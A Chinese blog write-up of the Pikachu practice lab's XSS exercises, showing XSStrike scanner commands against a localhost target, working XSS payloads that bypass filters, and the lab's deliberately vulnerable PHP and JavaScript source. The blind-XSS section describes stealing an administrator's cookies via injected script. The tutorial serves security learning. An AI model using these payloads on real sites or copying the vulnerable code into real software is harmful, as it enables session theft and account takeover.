网络安全-靶机pikachu之xss注入与代码分析（XSStrike实战）

向右看齐 2022-12-18 11:56 199阅读 0赞

**目录**

反射型XSS(get)

攻击

代码分析

主要步骤

反射型XSS(post)

攻击

代码分析

主要步骤

存储型XSS

攻击

代码分析

主要步骤

DOM型XSS

攻击

代码分析

主要步骤

DOM型XSS-X

代码分析

主要步骤

漏洞原因

XSS之盲打

攻击

代码分析

主要步骤

漏洞原因

XSS之过滤

攻击

代码分析

主要步骤

XSS之HTML特殊字符

攻击

代码分析

主要步骤

XSS之href输出

攻击

代码分析

主要步骤

XSS之js输出

攻击

代码分析

主要步骤

总结

--------------------

本文使用靶机pikachu，来练习一下工具XSStrike

常用命令

*  \-u url
 *  \--skip 跳过确认提示
 *  \--skip-dom 跳过dom型扫描
 *  \--data post型时的数据

更多内容查看：[网络安全-XSStrike中文手册（自学笔记）][-XSStrike]

# 反射型XSS(get) #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70][] 输入kobe

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 1][] 正常

可以看到，是get型，页面返回正常

## 攻击 ##

python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=kobe&submit=submit" --skip --skip-dom

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 2][]

试一下第一个payload，利用的是html的details标签

<detAiLs%0DoNtoGgle%0A=%0Aconfirm()//

http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=%3CdetAiLs%0doNtoGgle%0a=%0aconfirm()//&submit=submit

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 3][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 4][]

## 代码分析 ##

$html='';
    if(isset($_GET['submit'])){
        if(empty($_GET['message'])){
            $html.="<p class='notice'>输入'kobe'试试-_-</p>";
        }else{
            if($_GET['message']=='kobe'){
                $html.="<p class='notice'>愿你和{$_GET['message']}一样，永远年轻，永远热血沸腾！</p><img src='{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png' />";
            }else{
                $html.="<p class='notice'>who is {$_GET['message']},i don't care!</p>";
            }
        }
    }
    
    <?php echo $html;?>

### 主要步骤 ###

*  isset检测变量submit是否已设置并且非 NULL，即判断用户是否点击了submit按钮。
 *  得到message参数，判断是否非空。若为空，输出提示。若非空且为kobe，输出上面截图的图片及内容。
 *  否则，拼接到html变量，并输出html

# 反射型XSS(post) #

登录后输入1，打开Hackbar和F12的控制台，分别获取POST数据和Cookie。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 5][] 获取POST数据和Cookie

## 攻击 ##

注意，Cookie:之后有一个**空格**。

python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xsspost/xss_reflected_post.php" --data "message=1&submit=submit" --headers "Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=slttj3hh1eig65tvj7ldppb984"

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 6][]

使用第2个吧，

<d3v%09onmousEOVer%0d=%0dconfirm()%0dx>v3dm0s

burpsuite拦截，修改post数据

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 7][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 8][]

## 代码分析 ##

if(!$is_login_id){
    
        header("location:post_login.php");
    
    }
    
    $state = '你已经登陆成功,<a href="xss_reflected_post.php?logout=1">退出登陆</a>';
    $html='';
    if(isset($_POST['submit'])){
        if(empty($_POST['message'])){
            $html.="<p class='notice'>输入'kobe'试试-_-</p>";
        }else{
    
            //下面直接将前端输入的参数原封不动的输出了,出现xss
            if($_POST['message']=='kobe'){
                $html.="<p class='notice'>愿你和{$_POST['message']}一样，永远年轻，永远热血沸腾！</p><img src='{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png' />";
            }else{
                $html.="<p class='notice'>who is {$_POST['message']},i don't care!</p>";
            }
        }
    }
    
    
    
    if(isset($_GET['logout']) && $_GET['logout'] == '1'){
        setcookie('ant[uname]','');
        setcookie('ant[pw]','');
        header("location:post_login.php");
    
    }

### 主要步骤 ###

相同的不再赘述。和之前相比，添加了登录，用来设置Cookie，不过仍然是进行拼接，没有任何过滤。

# 存储型XSS #

输入1，点击提交，返回正常。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 9][]

## 攻击 ##

注意，由于保存到数据库，及时按Ctrl+C

python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_stored.php" --data "message=1&submit=submit" --headers "Cookie: csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=slttj3hh1eig65tvj7ldppb984" --skip-dom --skip

XSStrike结果

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 10][]

pikachu页面结果

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 11][]

数据库中message表部分内容：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 12][]

### 代码分析 ###

$html='';
    if(array_key_exists("message",$_POST) && $_POST['message']!=null){
        $message=escape($link, $_POST['message']);
        $query="insert into message(content,time) values('$message',now())";
        $result=execute($link, $query);
        if(mysqli_affected_rows($link)!=1){
            $html.="<p>数据库出现异常，提交失败！</p>";
        }
    }
    
    
    if(array_key_exists('id', $_GET) && is_numeric($_GET['id'])){
    
        //彩蛋:虽然这是个存储型xss的页面,但这里有个delete的sql注入
        $query="delete from message where id={$_GET['id']}";
        $result=execute($link, $query);
        if(mysqli_affected_rows($link)==1){
            echo "<script type='text/javascript'>document.location.href='xss_stored.php'</script>";
        }else{
            $html.="<p id='op_notice'>删除失败,请重试并检查数据库是否还好!</p>";
    
        }
    
    }
    
    <?php echo $html;
                        $query="select * from message";
                        $result=execute($link, $query);
                        while($data=mysqli_fetch_assoc($result)){
                            echo "<p class='con'>{$data['content']}</p><a href='xss_stored.php?id={$data['id']}'>删除</a>";
                        }
    
                        echo $html;
                        ?>

### 主要步骤 ###

把message和时间存储到数据库，直接从数据库中拿出来展示。

输入未过滤，输出未转码，同时，有个彩蛋，删除时存在sql注入漏洞，需要绕过is\_numeric的过滤。

# DOM型XSS #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 13][] 出现what do you see链接

![20201026213130659.PNG][] 点击what do you see链接后

跳转到1，说明a链接中包含输入，且url上也存在输入。

## 攻击 ##

先试试和之前的[文件上传][Link 1]漏洞合作一把。

../unsafeupload/uploads/tupian.php

点击what do you see?，即可跳转。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 14][]

接下来就看xss，F12，查看链接

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 15][]

> <a href="1">what do you see?</a>

XSStrike

python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_dom.php" --data "message=1&submit=submit" --headers "Cookie: csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=toqllihbqq4jmiudeq49dfttt1" --skip

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 16][] 失败

手工，闭合一下，由于点击可能跳转，使用的onmouseover事件。

> ' onmouseover = "alert('lady\_killer9')"

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 17][] 成功

## 代码分析 ##

<div id="xssd_main">
                    <script>
                        function domxss(){
                            var str = document.getElementById("text").value;
                            document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
                        }
                        //试试：'><img src="#" onmouseover="alert('xss')">
                        //试试：' onclick="alert('xss')">,闭合掉就行
                    </script>
                    
                    <input id="text" name="text" type="text"  value="" />
                    <input id="button" type="button" value="click me!" onclick="domxss()" />
                    <div id="dom"></div>
                </div>

### 主要步骤 ###

使用innerHTML在id为dom的 div块中添加a链接，输入的转为字符串放到a链接的href属性上。

# DOM型XSS-X #

输入伤心的往事

> 上道题使用XSStrike没做出来

出现了一个链接，是get型传参。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 18][]

点击a链接，又出现了一个，可以看到我们的输入，和上道题就一样了，我估计XSStrike还是做不出来，我就直接手工了。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 19][]

手工注入

> '><button οnclick="alert(/xss/)"></button>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 20][] 成功

哈哈哈，那个按钮太小了，差点没看见。你可以使用<img>标签，配合onerror等事件。

## 代码分析 ##

$html='';
    if(isset($_GET['text'])){
        $html.= "<a href='#' onclick='domxss()'>有些费尽心机想要忘记的事情,后来真的就忘掉了</a>";
    }  
    <div id="xssd_main">
                    <script>
                        function domxss(){
                            var str = window.location.search;
                            var txss = decodeURIComponent(str.split("text=")[1]);
                            var xss = txss.replace(/\+/g,' ');
    //                        alert(xss);
    
                            document.getElementById("dom").innerHTML = "<a href='"+xss+"'>就让往事都随风,都随风吧</a>";
                        }
                        //试试：'><img src="#" onmouseover="alert('xss')">
                        //试试：' onclick="alert('xss')">,闭合掉就行
                    </script>
                    
                    <form method="get">
                    <input id="text" name="text" type="text"  value="" />
                    <input id="submit" type="submit" value="请说出你的伤心往事"/>
                    </form>
                    <div id="dom"></div>
                </div>

### 主要步骤 ###

*  提交表单后，得到text，添加一个a链接，href属性为\#，点击运行domxss函数。
 *  domxss函数将text通过正则进行一个简单过滤，然后和上一个一样。

### 漏洞原因 ###

尝试过滤，但是**过滤太简单**。通过点击之后再显示输出，**可以解决大部分自动化注入脚本**，可以自己写脚本，添加锚点即可。

# XSS之盲打 #

输入

> 帅呆了
> 
> lady\_killer9

点击提交

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 21][] 正常

## 攻击 ##

python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xssblind/xss_blind.php" --data "content=帅呆了&name=lady_killer&submit=提交" --headers "Cookie: csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=toqllihbqq4jmiudeq49dfttt1" --skip

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 22][] 失败

点一下提示

![20201027111026364.PNG][] 提示

原来需要登录

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 23][] 登录后

管理员能够看到结果。我们可以通过xss注入，使用js发送邮件或使用websocket将管理员的cookie等发送到我们的服务器，在Cookie失效前使用，获得管理员权限。留言和用户名输入：

> <script>alert(document.cookie)</script>

登录管理员账号查看：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 24][] 攻击成功

## 代码分析 ##

if(array_key_exists("content",$_POST) && $_POST['content']!=null){
        $content=escape($link, $_POST['content']);
        $name=escape($link, $_POST['name']);
        $time=$time=date('Y-m-d g:i:s');
        $query="insert into xssblind(time,content,name) values('$time','$content','$name')";
        $result=execute($link, $query);
        if(mysqli_affected_rows($link)==1){
            $html.="<p>谢谢参与，阁下的看法我们已经收到!</p>";
        }else {
            $html.="<p>ooo.提交出现异常，请重新提交</p>";
        }
    }
    
                        <?php
                        $query="select * from xssblind";
                        $result=mysqli_query($link, $query);
                        while($data=mysqli_fetch_assoc($result)){
                            $html=<<<A
        <tr>
            <td>{$data['id']}</td>
            <td>{$data['time']}</td>
            <td>{$data['content']}</td>
            <td>{$data['name']}</td>
            <td><a href="admin.php?id={$data['id']}">删除</a></td>
        </tr>
    A;
                            echo $html;
                        }
    
                        ?>

### 主要步骤 ###

提交后直接保存到数据库。显示时直接从数据库读取出来拼接后显示。

### 漏洞原因 ###

未对输入进行过滤，输出时直接拼接。

个人认为这个成功的概率太低，真的是盲打，sql盲注时虽然没有具体的回显，但是好歹还知道sql语句是否运行成功，可以通过bool或时间判断。这个直接在管理员界面，你不清楚注入点，也不清楚是否需要闭合。

# XSS之过滤 #

输入

> 我用Python

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 25][] 正常页面

get型传参，有回显。

##  攻击 ##

python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_01.php?message=%E6%88%91%E7%94%A8Python&submit=submit" --skip

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 26][] 成功

我们就用下a链接和prompt吧，稍微修改了一下

> <a onMouseover = prompt('enteryoupassword')>lady\_killer9

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 27][]

## 代码分析 ##

$html = '';
    if(isset($_GET['submit']) && $_GET['message'] != null){
        //这里会使用正则对<script进行替换为空,也就是过滤掉
        $message=preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/', '', $_GET['message']);
    //    $message=str_ireplace('<script>',$_GET['message']);
    
        if($message == 'yes'){
            $html.="<p>那就去人民广场一个人坐一会儿吧!</p>";
        }else{
            $html.="<p>别说这些'{$message}'的话,不要怕,就是干!</p>";
        }
    
    }

### 主要步骤 ###

注释写的很清楚，使用正则，**过滤**掉<script，我们可以使用html标签进行注入。

同时，有个小彩蛋，输入**yes**的话就不会显示你的输入了，而是固定的文本——那就去人民广场一个人坐一会儿吧!。

# XSS之HTML特殊字符 #

输入

> I use python

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 28][] 正常

get型，有回显，还是a链接。

## 攻击 ##

python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_02.php?message=I+use+python&submit=submit" --skip

攻击成功：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 29][] 成功

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 30][] 不对劲呀

被转义了，还是自己构造吧。

> ' onMouseover = alert(/xss/)

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 31][] 成功

## 代码分析 ##

if(isset($_GET['submit'])){
        if(empty($_GET['message'])){
            $html.="<p class='notice'>输入点啥吧！</p>";
        }else {
            //使用了htmlspecialchars进行处理,是不是就没问题了呢,htmlspecialchars默认不对'处理
            $message=htmlspecialchars($_GET['message']);
            $html1.="<p class='notice'>你的输入已经被记录:</p>";
            //输入的内容被处理后输出到了input标签的value属性里面,试试:' onclick='alert(111)'
    //        $html2.="<input class='input' type='text' name='inputvalue' readonly='readonly' value='{$message}' style='margin-left:120px;display:block;background-color:#c0c0c0;border-style:none;'/>";
            $html2.="<a href='{$message}'>{$message}</a>";
        }
    }

### 主要步骤 ###

注释写的很清楚，使用htmlspecialchars进行处理，更多php安全相关内容，可以查看[网络安全-php安全知识点][-php]。

然后拼接到a链接的href属性和输出上。

# XSS之href输出 #

输入

> www.google.com

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 32][] 成功

get型传参，有回显，输入到了a链接的href属性上。

## 攻击 ##

python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_03.php?message=www.google.com&submit=submit" --skip

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 33][] 竟然不用按Ctrl+C停止

竟然不用自己停止，amazing！！！就用第一个吧。

> JavasCript:(confirm)()

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 34][] 攻击成功

使用的js伪协议，估计是有过滤，接下来看看源码吧。

## 代码分析 ##

if(isset($_GET['submit'])){
        if(empty($_GET['message'])){
            $html.="<p class='notice'>叫你输入个url,你咋不听?</p>";
        }
        if($_GET['message'] == 'www.baidu.com'){
            $html.="<p class='notice'>我靠,我真想不到你是这样的一个人</p>";
        }else {
            //输出在a标签的href属性里面,可以使用javascript协议来执行js
            //防御:只允许http,https,其次在进行htmlspecialchars处理
            $message=htmlspecialchars($_GET['message'],ENT_QUOTES);
            $html.="<a href='{$message}'> 阁下自己输入的url还请自己点一下吧</a>";
        }
    }

### 主要步骤 ###

哈哈哈，这个逗比作者，还好我没写百度。

他也提示了，使用javascript协议绕过即可。

# XSS之js输出 #

输入

> tmac

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 35][] 正常返回

## 攻击 ##

python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_04.php?message=tmac&submit=submit#" --skip

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 36][] 生成payload

不太对劲呀，每次都是这个payload，也不说怎么闭合。我黏贴了几个payload，很明显，并不行。

通过提示，我们知道是javascript动态生成，我们输入</script>试一下。

![20201027161712867.PNG][] 成功了

通过下面的内容，可能是单引号加</script>闭合。

## 代码分析 ##

//这里讲输入动态的生成到了js中,形成xss
    //javascript里面是不会对tag和字符实体进行解释的,所以需要进行js转义
    //讲这个例子主要是为了让你明白,输出点在js中的xss问题,应该怎么修?
    //这里如果进行html的实体编码,虽然可以解决XSS的问题,但是实体编码后的内容,在JS里面不会进行翻译,这样会导致前端的功能无法使用。
    //所以在JS的输出点应该使用\对特殊字符进行转义
    
    if(isset($_GET['submit']) && $_GET['message'] !=null){
        $jsvar=$_GET['message'];
        if($jsvar == 'tmac'){
            $html.="<img src='{$PIKA_ROOT_DIR}assets/images/nbaplayer/tmac.jpeg' />";
        }
    }
    
    <p id="fromjs"></p>
    <?php echo $html;?>
    
    <script>
        $ms='<?php echo $jsvar;?>';
        if($ms.length != 0){
            if($ms == 'tmac'){
                $('#fromjs').text('tmac确实厉害,看那小眼神..')
            }else {
                $('#fromjs').text('无论如何不要放弃心中所爱..')
            }
    
        }
    </script>

### 主要步骤 ###

两个输出，id为fromjs的p标签内容和html变量，根据读入的变量message是否为tmac。

我们输入kobe，提交一下，查看生成的js。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 37][]

可以看到单引号闭合。

> '</script><script>alert('lady\_killer9')</script>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 38][] 成功

# 总结 #

常见闭合：单引号，双引号，js标签，html标签

XSStrike问题：不显示需要什么字符、标签进行闭合，应该就是按顺序注入的，能够注入成功的话就显示。

更多内容查看：[网络安全-自学笔记][-]

喜欢本文的请动动小手点个赞，收藏一下，有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。如果您感觉有所收获，自愿打赏，可选择支付宝18833895206（小于），您的支持是我不断更新的动力。

[-XSStrike]: https://blog.csdn.net/lady_killer9/article/details/109105084
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70]: /images/20221122/a0663f8226754a17b1a916865749b829.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 1]: /images/20221122/c220cd14f6764c5f96aca9ddf3f68ec2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 2]: /images/20221122/cfe1af0a2eef4b37929a3d95faaa5dcc.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 3]: /images/20221122/7d1917791daa415db6eaaf0086f2c8f5.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 4]: /images/20221122/97dfd8adbeef4c9b85c34aaab3d08d9f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 5]: /images/20221122/77a1478f69cb413ebd8c453d032c4b7b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 6]: /images/20221122/3014c02e6a344dabb00610b1d2314a82.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 7]: /images/20221122/0e7366d0858242c1b19e7ea68c47f20b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 8]: /images/20221122/22e33be42bec42958139705bc7c83dd6.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 9]: /images/20221122/1ec6019fd180436f8f7893affaa2b090.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 10]: /images/20221122/77c75a52951c451092c2b71c99f238ae.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 11]: /images/20221122/8ca9555be43e4bc690b1e179800ee81c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 12]: /images/20221122/958990bba50c4b379ce5d764cf512360.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 13]: /images/20221122/16d875d4eeda4bf6972fa3e85c7f23af.png
[20201026213130659.PNG]: /images/20221122/4d9c2c8c3fd04271bf4a415ee4e10488.png
[Link 1]: https://blog.csdn.net/lady_killer9/article/details/107997034
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 14]: /images/20221122/7b29e7185c7d4adb9f9ff463fe703864.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 15]: /images/20221122/4dc5ba91e9ee49c8a1567360e88d2423.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 16]: /images/20221122/fa521627731242df9c03f9ebc4a6568b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 17]: /images/20221122/c3fca5f3ad3140e59335660697dd61b4.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 18]: /images/20221122/1e2b69925e8342458d3fdf9d4cacc404.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 19]: /images/20221122/7364852d13b241d9a7b45ee073c8d296.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 20]: /images/20221122/df318325c1644052b67d6224388e0126.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 21]: /images/20221122/69098e04eb9e4d2788310aaec5068b32.png
